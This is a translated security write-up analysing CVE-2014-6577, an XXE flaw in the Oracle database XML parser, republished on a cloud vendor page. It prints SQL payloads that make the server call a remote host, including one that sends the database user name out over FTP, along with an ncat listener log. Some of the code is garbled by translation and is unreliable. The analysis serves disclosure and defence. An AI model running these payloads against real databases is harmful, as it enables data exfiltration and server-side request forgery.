Oracle Database XXE Injection Vulnerability Analysis (cve-2014-6577)

Source: Internet
Author: User
Tags remote ftp server xml parser cve



In this article, we will work together to analyze the Oracle database's XXE Injection Vulnerability (cve-2014-6577), which was released by Oracle on January 20 with patches for this vulnerability.



For XXE related knowledge, you can check the security pulse station in another article, "Unknown attack to know how to prevent--xxe loopholes defense."


Vulnerability Description


The XML parser module of an Oracle database is easily injected by XML external entities (XML External entity, XXE).



Affected versions: 11.2.0.3, 11.2.0.4, 12.1.0.1 and 12.1.0.2



Required Permissions: Create session





Technical Details


Because of the security features of the XML parser in Oracle, the external schema is resolved, but not resolved.



This can prevent some XXe injection attacks, such as reading local files on the remote database server.



However, an attacker could send a specially crafted SQL query to trigger an XML parser that would trick the server into connecting a remote resource over HTTP or FTP.



This can result in data leaks due to out-of-band channels, performing port scans on remote internal systems, performing server-side request forgery (SSRF) attacks, or causing denial-of-service attacks (DoS).



Vulnerable URI Handler:


    • http
    • Ftp:
0x01


Oracle's XML parser can be triggered by invoking the Extractvalue () function on an XML type object. Here is a simple example that uses a simple XXe injection payload to construct a query statement:


Select Extractvalue (XmlType (' <! ENTITY XXe SYSTEM "etc/passwd" >]> "| | ' & ' | | ' XXe; '), '/L ') from dual;


Executing the above query statement will cause the following error:


ORA-31001: Invalid resource handle or path name "/etc/passwd"
ORA-06512: at "SYS.XMLTYPE", line 310
ORA-06512: at line 1
31001. 00000 - "Invalid resource handle or path name \"%s\""
*Cause: An invalid resource handle or path name was passed to
the XDB hierarchical resolver.
*Action: Pass a valid resouce handle or path name to the hierarchical
resolver.


This is because the file URI handler is converted to a xdb library path.


0x02


However, replacing the HTTP URI handler with a query will create another problem. The sample query code is as follows:


Select Extractvalue (XmlType (' <! ENTITY XXe SYSTEM "http://IP/test" >]> "| | ' & ' | | ' XXe; '), '/L ') from dual;


The database server error is as follows:


ORA-31020: The operation is not allowed, Reason: For security reasons, ftp and http access over XDB repository is not allowed on server side
ORA-06512: at "SYS.XMLTYPE", line 310
ORA-06512: at line 1
31020. 00000 - "The operation is not allowed, Reason: %s"
*Cause: The operation attempted is not allowed
*Action: See reason and change to a valid operation.


This error indicates that the FTP and HTTP URI handlers may be accepted by the XML parser. Note that the above query statement does not send any HTTP requests to the attacker's system.


0x03


Let's look at another XXe injection payload, this time referencing a parameter entity instead of a document entity:


select extractvalue(xmltype(‘<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://IP/test"> %remote; %param1;]>‘),‘/l‘) from dual;


The same error (ORA-31020) is generated by the database server when executing the query statement. However, this time successfully tricked the server into submitting an HTTP request to the resource "test". The following is an HTTP log on the attacker's server:


ncat -lvp 80
Ncat: Version 6.25 ( http://nmap.org/ncat )
Ncat: Listening on :::80
Ncat: Listening on 0.0.0.0:80
Ncat: Connection from DB_IP.
Ncat: Connection from DB_IP:27320.
GET /test HTTP/1.0
Host: DB_IP
Content-Type: text/plain; charset=utf-8


Traditionally, in order to force the server to send HTTP requests to external resources, an attacker would need permission to access the Utl_http package. Because Extractvalue () is available to all database users, XXe injection introduces another way to trigger out-of-band HTTP requests, and the implementation of this method does not require the permission mentioned above.


0x04


The FTP URI handler (ftp:) can also be used to trigger an Oracle XML parser. The following is an example of a query statement that sends a database user name as an FTP user name:


Select Extractvalue (XmlType (' <?xml version= "1.0" encoding= "UTF-8"? ><! DOCTYPE Root [<! ENTITY% remote SYSTEM "ftp://" | | user| | ': [email protected]/test >%remote; %PARAM1;] > '), '/L ') from dual;


The database server prompts for an error (note that the error code differs from the above because the supplied voucher cannot be used to log on to the remote FTP server) as follows:


ORA-31011: XML parsing failed
ORA-19202: Error occurred in XML processing
LPX-00202: could not open "ftp://SYSTEM:[email protected]/test" (error 402)
Error at line 1
ORA-06512: at "SYS.XMLTYPE", line 310
ORA-06512: at line 1
31011. 00000 - "XML parsing failed"
*Cause: XML parser returned an error while trying to parse the document.
*Action: Check if the document to be parsed is valid.


As you can see, the database user name is included as an FTP user name in the FTP traffic sent to the attacker's server:






Oracle Database XXE Injection Vulnerability Analysis (cve-2014-6577)


Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.